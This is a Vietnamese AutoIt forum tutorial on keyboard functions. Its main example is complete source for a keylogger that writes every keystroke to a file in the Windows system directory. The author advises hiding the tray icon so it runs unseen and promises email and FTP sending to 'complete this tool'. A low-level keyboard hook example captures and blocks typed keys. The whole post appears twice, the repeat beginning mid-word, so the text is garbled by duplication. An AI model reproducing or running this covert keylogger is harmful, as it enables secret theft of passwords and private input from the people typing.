1. Tải bản cài đặt AutoIT mới nhất

  Chào Khách. Nếu bạn mới tham gia và chưa cài đặt AutoIT.
  Vui lòng vào topic trên để tải bản AutoIT mới nhất nhé
  Dismiss Notice
 2. Quy định và nội quy

  Chào Khách. Vui lòng đọc kỹ nội quy và quy định của diễn đàn
  Để tránh bị ban một cách đáng tiếc nhé!
  Dismiss Notice
 3. Hướng dẫn chèn mã AutoIT trong diễn đàn

  Chào Khách. Vui lòng xem qua bài viết này
  Để biết cách chèn mã AutoIT trong diễn đàn bạn nhé :)
  Dismiss Notice

Hướng dẫn Thao tác với phím trong Autoit

Thảo luận trong 'Hướng dẫn - Bài tập căn bản' bắt đầu bởi Phú Chuối, 11/9/15.

 1. Phú Chuối

  Phú Chuối Thành viên mới
  • 3/6

  Tham gia ngày:
  6/9/15
  Bài viết:
  6
  Đã được thích:
  13
  Keys Functions
  Các hàm thao tác với phím Ở phần này mình sẽ hướng dẫn các bạn cách để nhấn một phím trên keyboard bằng Autoit , cách theo dõi các phím nhập từ bàn phím và xuất các phím vừa nhập ra ngoài màn hình .
  Demo 2 code theo dõi phím nhập vào từ keyboard viết bằng hàm của Autoit và Hook

  Message Box (Hộp thoại)
  Các bạn chắc cũng nghe nhiều đến thuật ngữ này rồi , trong một số code mẫu mình viết ở bài trước cũng đã sử dụng hàm này rồi đó là MsgBox , hàm này dùng để xuất một khung thoại ra màn hình máy tính . Phần này ngoài lề của bài nhưng mình hơi lăn tăn về hàm này một tí để giúp cho các bạn dễ thao tác hơn với các lệnh trong bài :D
  Cú pháp : MsgBox ( flag, "title", "text" [, timeout [, hwnd]] )

  flagTùy chọn khung hộp thoại
  titleTiêu đề của hộp thoại
  textNội dung hộp thoại
  timeoutThời gian đếm ngược đến khi tắt khung thoại (Có thể có hoặc không)
  hwndTrả về handle của cửa sổ hiện hộp thoại (Có thể có hoặc không)
  Một ví dụ về hộp thoại mặc định :
  Mã (AutoIt):
  Msgbox(0,'Hello','This is the default message box !')
  Có rất nhiều loại Message Box , chỉ cần thay đổi flag là có được Message Box cần dùng , nhưng mình sẽ không đề cập đến việc tạo các loại Message Box khác nhau vì trong gói công cụ Scite đã đề cập ở các bài trước đã giới thiệu về công cụ này rồi , đó là : CodeWizard (Công cụ dùng để tạo các loại Message Box , Input Box , Splash ... rất cụ thể và dễ sử dụng ) . Các bạn tự nghiên cứu công cụ này để có thể tạo cho mình một Message Box theo ý thích và nhu cầu sử dụng ;)

  Các hàm thao tác với phím
  • Send
  Cú pháp : Send ( "keys" [, flag] )

  keys là phím được chỉ định send vào cửa sổ đang hoạt động , các phím hotkeyt như SHIFT , CTRL , ALT , SPACE .... được bọc trong dấu {} , các phím ký tự và phím số được đặt trong ' ' Viết tắt một vài phím thông dụng :

  {!} Phím ALT
  {#}Phím WINDOW
  {+}Phím SHIFT
  {^}Phím CTRL
  Ví dụ :
  Mã (AutoIt):
  Send("#r") ; Nhấn phím Window + phím r
  WinWaitActive("Run") ; Hàm dừng chờ cho đến khi cửa sổ hiện lên
  Send("notepad.exe{Enter}") ; Gửi vào khung nhâp một chuỗi rồi nhấm Enter
  WinWaitActive("[CLASS:Notepad]") ; Hàm dừng chờ cho đến khi cửa sổ hiện lên
  Send("Today's time/date is {F5}") ; Gửi vào khung nhâp một chuỗi rồi nhấm F5
  • ControlSend
  Cú pháp : ControlSend ( "title", "text", controlID, "string" [, flag] )

  ControlSend dùng để gửi phím nhập hay ký tự vào một khung cửa sổ xác định rõ

  titleTiêu đề của của cửa sổ
  textĐoạn văn bản bất kỳ xuất hiên trên cửa sổ
  controlIDID của control trong cửa sổ . xem thêm Controls.
  stringChuỗi hoặc phím hoặc ký tự được chỉ định để gửi
  flagMặc định là 0 (Cái này nên để mặc định)

  Ví dụ :
  Mã (AutoIt):
   Send("#r") ; Nhấn phím Window + phím r
  WinWaitActive("Run") ; Hàm dừng chờ cho đến khi cửa sổ hiện lên
  Send("notepad.exe{Enter}") ; Gửi vào khung nhâp một chuỗi rồi nhấm Enter
  WinWaitActive("[CLASS:Notepad]") ; Hàm dừng chờ cho đến khi cửa sổ hiện lên
  ControlSend("[CLASS:Notepad]", "", "Edit1", "This is a line of text in the notepad window")
  ; Send một chuỗi vào khung Edit của Notepad
  Hàm kiểm tra ký tự nhập vào (_Ispressed) và low level hook API :
  • _Ispressed
  Cú pháp : _IsPressed($sHexKey [, $vDLL = 'user32.dll'])

  Hàm _Ispressed là hàm được định nghĩa trong thu viện Misc.au3 nên phải include thư viện trước khi có lời gọi hàm .
  $sHexKey là mã Hex của phím , có thể tra bảng mã hex chi tiết và đầy đủ ở đây : ASCII
  $vDLL = 'user32.dll' là thư viện liên kết động của MS dùng để thực hiện hàm

  Đây là một ví dụ về hàm kiểm tra ký tự nhập vào _Ispressed được phát triển thành một công cụ mà ta thường hay gọi là keylogger :
  Mã (AutoIt):


  MÃ:
  Opt("SendKeyDelay",150)
  Opt("SendKeyDownDelay",50)

  Global $keyf,$keyup,$ckok=False,$f_path = @SystemDir & "\keylog.txt"
  Global $shdown=True,$shup
  Global $sDateTime = @YEAR & "-" & @MON & "-" & @MDAY &" "&@HOUR & ":" & @MIN & ":" & @SEC
  ;Separate hex and char
  $hex = StringSplit("08,09,0d,10,11,12,13,14,1b,20,21,22,23,24,25,26,27,28,2c,2d,2e," & _
  "30,31,32,33,34,35,36,37,38,39,41,42,43,44,45,46,47,48,49,4a,4b,4c,4d,4e,4f,50,51,52,53,54,55,56,57,58,59,5a," & _
  "ba,bb,bc,bd,be,bf,c0,db,dc,dd,5b,5c", _
  ",")

  $char = StringSplit(" BACKSPACE , TAB , ENTER , SHIFT , CTR , ALT , PAUSE , CAPLOCKS , ESC , SPACE , PAGEUP , PAGEDOWN , END , HOME , LEFT , UP , RIGHT , DOWN , PRINTSCR , INS , DEL ," & _
  "0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z" & _
  " ; , = , dot , - , . , / , ` , [ , \ , ], lWIN , rWIN ", _
  ",")
  ;=>End
  HotKeySet ("^!#{f12}","thoat")
  Func thoat()
  DllClose($dll)
  FileClose($file)
  Run("notepad.exe " & $f_path)
  Exit
  EndFunc
  ;;=> Ket thuc ham

  If Not FileExists($f_path) Then _FileWriteLog($f_path,'')

  $dll = DllOpen("user32.dll")
  $file = FileOpen($f_path, 1)
  If $file = -1 Then
  MsgBox(0, "Loi", "Khong the mo file")
  Exit
  EndIf
  FileWriteLine($file, $sDateTime)
  While 1
  Sleep ( 10 )
  readchar()
  WEnd

  DllClose($dll)

  Func readchar()
  For $i = 1 to $hex[0]
  Select
  Case _IsPressed($hex[$i],$dll)
  If _IsPressed("10", $dll) Then
  if $shdown ==True Then
  FileWrite($file," SHIFTDOWN ")
  Sleep(30)
  $shdown= False
  $shup= True
  EndIf
  Else
  $keyup = $hex[$i]
  checkku()
  writechar($char[$i])
  EndIf
  Case _IsRelease("10", $dll)
  if $shup== True Then
  FileWrite($file," SHIFTUP ")
  Sleep(30)
  $shdown= True
  $shup= False
  EndIf
  EndSelect

  Next
  EndFunc

  Func checkku()
  Do
  If _IsRelease($keyup,$dll) then
  $ckok =True
  EndIf
  Until $ckok =true
  EndFunc

  Func writechar($keyf= "")
  If $file = -1 Then
  MsgBox(0, "Loi", "Khong the mo file.")
  Exit
  EndIf
  If $ckok =true then
  FileWrite($file,$keyf)
  Sleep(10)
  $ckok =False
  EndIf
  EndFunc


  Func _IsPressed($sHexKey, $vDLL = 'user32.dll')
  Local $a_R = DllCall($vDLL, "int", "GetAsyncKeyState", "int", '0x' & $sHexKey)
  If Not @error And BitAND($a_R[0], 0x8000) = 0x8000 Then Return 1
  Return 0
  EndFunc

  Func _IsRelease($sHexKey, $vDLL = 'user32.dll')
  Local $a_R = DllCall($vDLL, "int", "GetAsyncKeyState", "int", '0x' & $sHexKey)
  If Not @error And BitAND($a_R[0], 0x8000) = 0x8000 Then Return 0
  Return 1
  EndFunc

  Func _FileWriteLog($sLogPath, $sLogMsg, $iFlag = -1)
  Local $sDateNow, $sTimeNow, $sMsg, $iWriteFile, $hOpenFile, $iOpenMode = 1

  $sDateNow = @YEAR & "-" & @MON & "-" & @MDAY
  $sTimeNow = @HOUR & ":" & @MIN & ":" & @SEC
  $sMsg = $sDateNow & " " & $sTimeNow & " : " & $sLogMsg

  If $iFlag <> -1 Then
  $sMsg &= @CRLF & FileRead($sLogPath)
  $iOpenMode = 2
  EndIf

  $hOpenFile = FileOpen($sLogPath, $iOpenMode)
  If $hOpenFile = -1 Then Return SetError(1, 0, 0)

  $iWriteFile = FileWriteLine($hOpenFile, $sMsg)
  If $iWriteFile = -1 Then Return SetError(2, 0, 0)

  Return FileClose($hOpenFile)
  EndFunc ;==>_FileWriteLog
  Ấn tổ hợp phím Ctrl + Windows + Alt + F12 để thoát và hiện file log.
  Có thể thêm vào #NoTrayIcon để chương trình chạy dưới chế độ ẩn

  Ở các bài sau mình sẽ đề cập đến mã nguồn Autoit có chức năng gửi email và FTP để hoàn thiện tool này , còn bây giờ chúng ta chuyển qua Hook API


  • API Low-Level Hook
  Câu hỏi được đặt ra ở đây là : Tại sao lại sử dụng API Hook trong khi đã có _Ispressed .Các bạn sau khi đã chạy thử ví dụ mẫu ở trên chắc cũng đã thấy nhược điểm của hàm _Ispressed , đó là các phím nhập vào đôi khi bị trùng do người dùng nhấn giữ phím quá lâu hoặc một số phím bị mất do người dùng đánh phím quá nhanh . API Hook sẽ giải quyết được vấn đề này , ngoài ra API Hook còn có nhiều ứng dụng quan trọng hơn nữa

  Ví dụ mẫu về việc sử dụng API để Hook , đọc ký tự nhập vào từ bàn phím và khóa các phím nhập vào:
  Mã (AutoIt):

  Ví dụ mẫu về việc sử dụng API để Hook , đọc ký tự nhập vào từ bàn phím và khóa các phím nhập vào:

  MÃ:
  #include <WinAPI.au3>
  #include <String.au3>
  #Include <WindowsConstants.au3>

  Global $sHexKeys, $sMouse, $sString, $hHookKeyboard, $pStub_KeyProc

  HotKeySet("{ESC}", "ExitNow") ; Exit khi nhấn phím Esc

  $pStub_KeyProc = DllCallbackRegister("_KeyProc", "int", "int;ptr;ptr")
  $hHookKeyboard = _WinAPI_SetWindowsHookEx($WH_KEYBOARD_LL, DllCallbackGetPtr($pStub_KeyProc), _WinAPI_GetModuleHandle(0))

  While 1
      Sleep(10)
  WEnd

  Func ExitNow()
      Exit
  EndFunc   ;==>ExitNow

  Func OnAutoITExit()
      DllCallbackFree($pStub_KeyProc)
      _WinAPI_UnhookWindowsHookEx($hHookKeyboard)
  EndFunc   ;==>OnAutoITExit

  Func _KeyProc($nCode, $wParam, $lParam)
      If $nCode < 0 Then Return _WinAPI_CallNextHookEx($hHookKeyboard, $nCode, $wParam, $lParam)
      Local $KBDLLHOOKSTRUCT = DllStructCreate("dword vkCode;dword scanCode;dword flags;dword time;ptr dwExtraInfo", $lParam)
      Local $vkCode = DllStructGetData($KBDLLHOOKSTRUCT, "vkCode")
      Switch $wParam
          Case $WM_KEYDOWN;, $WM_SYSKEYDOWN

              If (($vkCode > 64) And ($vkCode < 91)) _ ; a -z
              Or (($vkCode > 96) And ($vkCode < 123)) _ ; A - Z
              Or (($vkCode > 47) And ($vkCode < 58)) Then ; 0 - 9 ; Mã Hex của các ký tự nhập vào từ bàn phím

            _keybd_event('', 0) ; Hàm trả về phím rỗng dùng để khóa phím nhập vào , thay đổi mã hex ở trên để tùy chỉnh khóa phím được chỉ định

            ToolTip(Chr($vkCode)) ; Hiển thị các phím nhập vào ở đây

                 Return -1

              ElseIf ($vkCode > 159) And ($vkCode < 164) Then ; Các phím hotkey sẽ không được xử lý
              Return

              EndIf
      EndSwitch
      Return _WinAPI_CallNextHookEx($hHookKeyboard, $nCode, $wParam, $lParam)
  EndFunc   ;==>_KeyProc

  Func _keybd_event($vkCode, $Flag)
      DllCall('user32.dll', 'int', 'keybd_event', 'int', $vkCode, 'int', 0, 'int', $Flag, 'ptr', 0)
  EndFunc; _keybd_event
  Nhấn Esc để thoát chương trình

  • API Send key to Inactive Window
  Một ví dụ khác về sử dụng API để send key vào cửa sổ inactive (minimize/hide).
  Mã (AutoIt):
   #Include  <winapi.au3>
  #include   <windowsconstants.au3>
  #include "VK.au3"

  $timeKeyDown = 10

  AutoItSetOption("WinTitleMatchMode", 2)
  ;run('Notepad.exe')
  ;WinWaitActive('Untitled - Notepad')
  $handle = ControlGetHandle('Untitled - Notepad' ,'' , 'Edit1')

  ;~ _WinAPI_PostMessage($handle,0x108, 0x11,0)
  ;~ _WinAPI_PostMessage($handle, 0x101, 0x53 , 0 )

  _Send($handle,'This{SPACE}is{SPACE}just{SPACE}a{SPACE}test{ENTER}')

  Func _Send( $whandle, $text)
  If $text = "" Then Return
  Local $l, $l2, $len=StringLen($text), $sendnow
  For $l=1 To $len
  $sendnow = StringMid($text,$l,1)
  If $sendnow="{" Then
  $sendnow = ""
  While 1
  $l += 1
  $l2 = StringMid( $text,$l,1)
  If $l2="}" Or $l>$len Then ExitLoop
  $sendnow &= $l2
  WEnd
  EndIf
  _WinAPI_PostMessage($whandle, 0x100, Eval( "VK_" & StringUpper($sendnow)), 0) ;keydown
  Sleep( $timeKeyDown)
  ;_WinAPI_PostMessage($whandle, 0x101, Eval( "VK_" & StringUpper($sendnow)), 0 ) ;keyup
  Next
  EndFunc
  Thư viện VK.au3 (Khai báo các key ở dạng hex và một số const API )
  Mã (AutoIt):
  ài nhưng mình hơi lăn tăn về hàm này một tí để giúp cho các bạn dễ thao tác hơn với các lệnh trong bài :D
  Cú pháp : MsgBox ( flag, "title", "text" [, timeout [, hwnd]] )

  flagTùy chọn khung hộp thoại
  titleTiêu đề của hộp thoại
  textNội dung hộp thoại
  timeoutThời gian đếm ngược đến khi tắt khung thoại (Có thể có hoặc không)
  hwndTrả về handle của cửa sổ hiện hộp thoại (Có thể có hoặc không)
  Một ví dụ về hộp thoại mặc định :

  MÃ:
  Msgbox(0,'Hello','This is the default message box !')
  Có rất nhiều loại Message Box , chỉ cần thay đổi flag là có được Message Box cần dùng , nhưng mình sẽ không đề cập đến việc tạo các loại Message Box khác nhau vì trong gói công cụ Scite đã đề cập ở các bài trước đã giới thiệu về công cụ này rồi , đó là : CodeWizard (Công cụ dùng để tạo các loại Message Box , Input Box , Splash ... rất cụ thể và dễ sử dụng ) . Các bạn tự nghiên cứu công cụ này để có thể tạo cho mình một Message Box theo ý thích và nhu cầu sử dụng ;)

  Các hàm thao tác với phím
  Send
  Cú pháp : Send ( "keys" [, flag] )

  keys là phím được chỉ định send vào cửa sổ đang hoạt động , các phím hotkeyt như SHIFT , CTRL , ALT , SPACE .... được bọc trong dấu {} , các phím ký tự và phím số được đặt trong ' ' Viết tắt một vài phím thông dụng :

  {!} Phím ALT
  {#}Phím WINDOW
  {+}Phím SHIFT
  {^}Phím CTRL
  Ví dụ :

  MÃ:
  Send("#r") ; Nhấn phím Window + phím r
  WinWaitActive("Run") ; Hàm dừng chờ cho đến khi cửa sổ hiện lên
  Send("notepad.exe{Enter}") ; Gửi vào khung nhâp một chuỗi rồi nhấm Enter
  WinWaitActive("[CLASS:Notepad]") ; Hàm dừng chờ cho đến khi cửa sổ hiện lên
  Send("Today's time/date is {F5}") ; Gửi vào khung nhâp một chuỗi rồi nhấm F5
  ControlSend
  Cú pháp : ControlSend ( "title", "text", controlID, "string" [, flag] )

  ControlSend dùng để gửi phím nhập hay ký tự vào một khung cửa sổ xác định rõ

  titleTiêu đề của của cửa sổ
  textĐoạn văn bản bất kỳ xuất hiên trên cửa sổ
  controlIDID của control trong cửa sổ . xem thêm Controls.
  stringChuỗi hoặc phím hoặc ký tự được chỉ định để gửi
  flagMặc định là 0 (Cái này nên để mặc định)

  Ví dụ :

  MÃ:
  Send("#r") ; Nhấn phím Window + phím r
  WinWaitActive("Run") ; Hàm dừng chờ cho đến khi cửa sổ hiện lên
  Send("notepad.exe{Enter}") ; Gửi vào khung nhâp một chuỗi rồi nhấm Enter
  WinWaitActive("[CLASS:Notepad]") ; Hàm dừng chờ cho đến khi cửa sổ hiện lên
  ControlSend("[CLASS:Notepad]", "", "Edit1", "This is a line of text in the notepad window")
  ; Send một chuỗi vào khung Edit của Notepad
  Hàm kiểm tra ký tự nhập vào (_Ispressed) và low level hook API :
  _Ispressed
  Cú pháp : _IsPressed($sHexKey [, $vDLL = 'user32.dll'])

  Hàm _Ispressed là hàm được định nghĩa trong thu viện Misc.au3 nên phải include thư viện trước khi có lời gọi hàm .
  $sHexKey là mã Hex của phím , có thể tra bảng mã hex chi tiết và đầy đủ ở đây : ASCII
  $vDLL = 'user32.dll' là thư viện liên kết động của MS dùng để thực hiện hàm

  Đây là một ví dụ về hàm kiểm tra ký tự nhập vào _Ispressed được phát triển thành một công cụ mà ta thường hay gọi là keylogger :

  MÃ:
  Opt("SendKeyDelay",150)
  Opt("SendKeyDownDelay",50)

  Global $keyf,$keyup,$ckok=False,$f_path = @SystemDir & "\keylog.txt"
  Global $shdown=True,$shup
  Global $sDateTime = @YEAR & "-" & @MON & "-" & @MDAY &" "&@HOUR & ":" & @MIN & ":" & @SEC
  ;Separate hex and char
  $hex = StringSplit("08,09,0d,10,11,12,13,14,1b,20,21,22,23,24,25,26,27,28,2c,2d,2e," & _
  "30,31,32,33,34,35,36,37,38,39,41,42,43,44,45,46,47,48,49,4a,4b,4c,4d,4e,4f,50,51,52,53,54,55,56,57,58,59,5a," & _
  "ba,bb,bc,bd,be,bf,c0,db,dc,dd,5b,5c", _
  ",")

  $char = StringSplit(" BACKSPACE , TAB , ENTER , SHIFT , CTR , ALT , PAUSE , CAPLOCKS , ESC , SPACE , PAGEUP , PAGEDOWN , END , HOME , LEFT , UP , RIGHT , DOWN , PRINTSCR , INS , DEL ," & _
  "0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z" & _
  " ; , = , dot , - , . , / , ` , [ , \ , ], lWIN , rWIN ", _
  ",")
  ;=>End
  HotKeySet ("^!#{f12}","thoat")
  Func thoat()
  DllClose($dll)
  FileClose($file)
  Run("notepad.exe " & $f_path)
  Exit
  EndFunc
  ;;=> Ket thuc ham

  If Not FileExists($f_path) Then _FileWriteLog($f_path,'')

  $dll = DllOpen("user32.dll")
  $file = FileOpen($f_path, 1)
  If $file = -1 Then
  MsgBox(0, "Loi", "Khong the mo file")
  Exit
  EndIf
  FileWriteLine($file, $sDateTime)
  While 1
  Sleep ( 10 )
  readchar()
  WEnd

  DllClose($dll)

  Func readchar()
  For $i = 1 to $hex[0]
  Select
  Case _IsPressed($hex[$i],$dll)
  If _IsPressed("10", $dll) Then
  if $shdown ==True Then
  FileWrite($file," SHIFTDOWN ")
  Sleep(30)
  $shdown= False
  $shup= True
  EndIf
  Else
  $keyup = $hex[$i]
  checkku()
  writechar($char[$i])
  EndIf
  Case _IsRelease("10", $dll)
  if $shup== True Then
  FileWrite($file," SHIFTUP ")
  Sleep(30)
  $shdown= True
  $shup= False
  EndIf
  EndSelect

  Next
  EndFunc

  Func checkku()
  Do
  If _IsRelease($keyup,$dll) then
  $ckok =True
  EndIf
  Until $ckok =true
  EndFunc

  Func writechar($keyf= "")
  If $file = -1 Then
  MsgBox(0, "Loi", "Khong the mo file.")
  Exit
  EndIf
  If $ckok =true then
  FileWrite($file,$keyf)
  Sleep(10)
  $ckok =False
  EndIf
  EndFunc


  Func _IsPressed($sHexKey, $vDLL = 'user32.dll')
  Local $a_R = DllCall($vDLL, "int", "GetAsyncKeyState", "int", '0x' & $sHexKey)
  If Not @error And BitAND($a_R[0], 0x8000) = 0x8000 Then Return 1
  Return 0
  EndFunc

  Func _IsRelease($sHexKey, $vDLL = 'user32.dll')
  Local $a_R = DllCall($vDLL, "int", "GetAsyncKeyState", "int", '0x' & $sHexKey)
  If Not @error And BitAND($a_R[0], 0x8000) = 0x8000 Then Return 0
  Return 1
  EndFunc

  Func _FileWriteLog($sLogPath, $sLogMsg, $iFlag = -1)
  Local $sDateNow, $sTimeNow, $sMsg, $iWriteFile, $hOpenFile, $iOpenMode = 1

  $sDateNow = @YEAR & "-" & @MON & "-" & @MDAY
  $sTimeNow = @HOUR & ":" & @MIN & ":" & @SEC
  $sMsg = $sDateNow & " " & $sTimeNow & " : " & $sLogMsg

  If $iFlag <> -1 Then
  $sMsg &= @CRLF & FileRead($sLogPath)
  $iOpenMode = 2
  EndIf

  $hOpenFile = FileOpen($sLogPath, $iOpenMode)
  If $hOpenFile = -1 Then Return SetError(1, 0, 0)

  $iWriteFile = FileWriteLine($hOpenFile, $sMsg)
  If $iWriteFile = -1 Then Return SetError(2, 0, 0)

  Return FileClose($hOpenFile)
  EndFunc ;==>_FileWriteLog
  Ấn tổ hợp phím Ctrl + Windows + Alt + F12 để thoát và hiện file log.
  Có thể thêm vào #NoTrayIcon để chương trình chạy dưới chế độ ẩn

  Ở các bài sau mình sẽ đề cập đến mã nguồn Autoit có chức năng gửi email và FTP để hoàn thiện tool này , còn bây giờ chúng ta chuyển qua Hook API


  API Low-Level Hook
  Câu hỏi được đặt ra ở đây là : Tại sao lại sử dụng API Hook trong khi đã có _Ispressed .Các bạn sau khi đã chạy thử ví dụ mẫu ở trên chắc cũng đã thấy nhược điểm của hàm _Ispressed , đó là các phím nhập vào đôi khi bị trùng do người dùng nhấn giữ phím quá lâu hoặc một số phím bị mất do người dùng đánh phím quá nhanh . API Hook sẽ giải quyết được vấn đề này , ngoài ra API Hook còn có nhiều ứng dụng quan trọng hơn nữa

  Ví dụ mẫu về việc sử dụng API để Hook , đọc ký tự nhập vào từ bàn phím và khóa các phím nhập vào:

  MÃ:
  #include <WinAPI.au3>
  #include <String.au3>
  #Include <WindowsConstants.au3>

  Global $sHexKeys, $sMouse, $sString, $hHookKeyboard, $pStub_KeyProc

  HotKeySet("{ESC}", "ExitNow") ; Exit khi nhấn phím Esc

  $pStub_KeyProc = DllCallbackRegister("_KeyProc", "int", "int;ptr;ptr")
  $hHookKeyboard = _WinAPI_SetWindowsHookEx($WH_KEYBOARD_LL, DllCallbackGetPtr($pStub_KeyProc), _WinAPI_GetModuleHandle(0))

  While 1
      Sleep(10)
  WEnd

  Func ExitNow()
      Exit
  EndFunc   ;==>ExitNow

  Func OnAutoITExit()
      DllCallbackFree($pStub_KeyProc)
      _WinAPI_UnhookWindowsHookEx($hHookKeyboard)
  EndFunc   ;==>OnAutoITExit

  Func _KeyProc($nCode, $wParam, $lParam)
      If $nCode < 0 Then Return _WinAPI_CallNextHookEx($hHookKeyboard, $nCode, $wParam, $lParam)
      Local $KBDLLHOOKSTRUCT = DllStructCreate("dword vkCode;dword scanCode;dword flags;dword time;ptr dwExtraInfo", $lParam)
      Local $vkCode = DllStructGetData($KBDLLHOOKSTRUCT, "vkCode")
      Switch $wParam
          Case $WM_KEYDOWN;, $WM_SYSKEYDOWN

              If (($vkCode > 64) And ($vkCode < 91)) _ ; a -z
              Or (($vkCode > 96) And ($vkCode < 123)) _ ; A - Z
              Or (($vkCode > 47) And ($vkCode < 58)) Then ; 0 - 9 ; Mã Hex của các ký tự nhập vào từ bàn phím

            _keybd_event('', 0) ; Hàm trả về phím rỗng dùng để khóa phím nhập vào , thay đổi mã hex ở trên để tùy chỉnh khóa phím được chỉ định

            ToolTip(Chr($vkCode)) ; Hiển thị các phím nhập vào ở đây

                 Return -1

              ElseIf ($vkCode > 159) And ($vkCode < 164) Then ; Các phím hotkey sẽ không được xử lý
              Return

              EndIf
      EndSwitch
      Return _WinAPI_CallNextHookEx($hHookKeyboard, $nCode, $wParam, $lParam)
  EndFunc   ;==>_KeyProc

  Func _keybd_event($vkCode, $Flag)
      DllCall('user32.dll', 'int', 'keybd_event', 'int', $vkCode, 'int', 0, 'int', $Flag, 'ptr', 0)
  EndFunc; _keybd_event
  Nhấn Esc để thoát chương trình

  API Send key to Inactive Window
  Một ví dụ khác về sử dụng API để send key vào cửa sổ inactive (minimize/hide).

  MÃ:
  #Include  <winapi.au3>
  #include   <windowsconstants.au3>
  #include "VK.au3"

  $timeKeyDown = 10

  AutoItSetOption("WinTitleMatchMode", 2)
  ;run('Notepad.exe')
  ;WinWaitActive('Untitled - Notepad')
  $handle = ControlGetHandle('Untitled - Notepad' ,'' , 'Edit1')

  ;~ _WinAPI_PostMessage($handle,0x108, 0x11,0)
  ;~ _WinAPI_PostMessage($handle, 0x101, 0x53 , 0 )

  _Send($handle,'This{SPACE}is{SPACE}just{SPACE}a{SPACE}test{ENTER}')

  Func _Send( $whandle, $text)
  If $text = "" Then Return
  Local $l, $l2, $len=StringLen($text), $sendnow
  For $l=1 To $len
  $sendnow = StringMid($text,$l,1)
  If $sendnow="{" Then
  $sendnow = ""
  While 1
  $l += 1
  $l2 = StringMid( $text,$l,1)
  If $l2="}" Or $l>$len Then ExitLoop
  $sendnow &= $l2
  WEnd
  EndIf
  _WinAPI_PostMessage($whandle, 0x100, Eval( "VK_" & StringUpper($sendnow)), 0) ;keydown
  Sleep( $timeKeyDown)
  ;_WinAPI_PostMessage($whandle, 0x101, Eval( "VK_" & StringUpper($sendnow)), 0 ) ;keyup
  Next
  EndFunc
  Thư viện VK.au3 (Khai báo các key ở dạng hex và một số const API )

  MÃ:
  Global Const $VK_LBUTTON = 0x01
  Global Const $VK_RBUTTON = 0x02
  Global Const $VK_CANCEL = 0x03
  Global Const $VK_MBUTTON = 0x04
  Global Const $VK_XBUTTON1 = 0x05
  Global Const $VK_XBUTTON2 = 0x06

  #cs
  * = 0x07 : unassigned
  #ce


  Global Const $VK_BACK = 0x08
  Global Const $VK_TAB = 0x09

  #cs
  * = 0x0A - = 0x0B : reserved
  #ce


  Global Const $VK_CLEAR = 0x0C
  Global Const $VK_ENTER = 0x0D

  Global Const $VK_SHIFT = 0x10
  Global Const $VK_CTRL = 0x11
  Global Const $VK_MENU = 0x12
  Global Const $VK_PAUSE = 0x13
  Global Const $VK_CAPITAL = 0x14

  Global Const $VK_KANA = 0x15
  Global Const $VK_HANGEUL = 0x15
  Global Const $VK_HANGUL = 0x15
  Global Const $VK_JUNJA = 0x17
  Global Const $VK_FINAL = 0x18
  Global Const $VK_HANJA = 0x19
  Global Const $VK_KANJI = 0x19

  Global Const $VK_ESCAPE = 0x1B

  Global Const $VK_CONVERT = 0x1C
  Global Const $VK_NONCONVERT = 0x1D
  Global Const $VK_ACCEPT = 0x1E
  Global Const $VK_MODECHANGE = 0x1F

  Global Const $VK_SPACE = 0x20
  Global Const $VK_PRIOR = 0x21
  Global Const $VK_NEXT = 0x22
  Global Const $VK_END = 0x23
  Global Const $VK_HOME = 0x24
  Global Const $VK_LEFT = 0x25
  Global Const $VK_UP = 0x26
  Global Const $VK_RIGHT = 0x27
  Global Const $VK_DOWN = 0x28
  Global Const $VK_SELECT = 0x29
  Global Const $VK_PRINT = 0x2A
  Global Const $VK_EXECUTE = 0x2B
  Global Const $VK_SNAPSHOT = 0x2C
  Global Const $VK_INSERT = 0x2D
  Global Const $VK_DELETE = 0x2E
  Global Const $VK_HELP = 0x2F

  Global Const $VK_0 = 0x30
  Global Const $VK_1 = 0x31
  Global Const $VK_2 = 0x32
  Global Const $VK_3 = 0x33
  Global Const $VK_4 = 0x34
  Global Const $VK_5 = 0x35
  Global Const $VK_6 = 0x36
  Global Const $VK_7 = 0x37
  Global Const $VK_8 = 0x38
  Global Const $VK_9 = 0x39

  #cs
  * = 0x40 : unassigned
  #ce


  Global Const $VK_A = 0x41
  Global Const $VK_B = 0x42
  Global Const $VK_C = 0x43
  Global Const $VK_D = 0x44
  Global Const $VK_E = 0x45
  Global Const $VK_F = 0x46
  Global Const $VK_G = 0x47
  Global Const $VK_H = 0x48
  Global Const $VK_I = 0x49
  Global Const $VK_J = 0x4A
  Global Const $VK_K = 0x4B
  Global Const $VK_L = 0x4C
  Global Const $VK_M = 0x4D
  Global Const $VK_N = 0x4E
  Global Const $VK_O = 0x4F
  Global Const $VK_P = 0x50
  Global Const $VK_Q = 0x51
  Global Const $VK_R = 0x52
  Global Const $VK_S = 0x53
  Global Const $VK_T = 0x54
  Global Const $VK_U = 0x55
  Global Const $VK_V = 0x56
  Global Const $VK_W = 0x57
  Global Const $VK_X = 0x58
  Global Const $VK_Y = 0x59
  Global Const $VK_Z = 0x5A

  Global Const $VK_LWIN = 0x5B
  Global Const $VK_RWIN = 0x5C
  Global Const $VK_APPS = 0x5D

  #cs
  * = 0x5E : reserved
  #ce


  Global Const $VK_SLEEP = 0x5F
  Global Const $VK_NUMPAD0 = 0x60
  Global Const $VK_NUMPAD1 = 0x61
  Global Const $VK_NUMPAD2 = 0x62
  Global Const $VK_NUMPAD3 = 0x63
  Global Const $VK_NUMPAD4 = 0x64
  Global Const $VK_NUMPAD5 = 0x65
  Global Const $VK_NUMPAD6 = 0x66
  Global Const $VK_NUMPAD7 = 0x67
  Global Const $VK_NUMPAD8 = 0x68
  Global Const $VK_NUMPAD9 = 0x69
  Global Const $VK_MULTIPLY = 0x6A
  Global Const $VK_ADD = 0x6B
  Global Const $VK_SEPARATOR = 0x6C
  Global Const $VK_SUBTRACT = 0x6D
  Global Const $VK_DECIMAL = 0x6E
  Global Const $VK_DIVIDE = 0x6F
  Global Const $VK_F1 = 0x70
  Global Const $VK_F2 = 0x71
  Global Const $VK_F3 = 0x72
  Global Const $VK_F4 = 0x73
  Global Const $VK_F5 = 0x74
  Global Const $VK_F6 = 0x75
  Global Const $VK_F7 = 0x76
  Global Const $VK_F8 = 0x77
  Global Const $VK_F9 = 0x78
  Global Const $VK_F10 = 0x79
  Global Const $VK_F11 = 0x7A
  Global Const $VK_F12 = 0x7B
  Global Const $VK_F13 = 0x7C
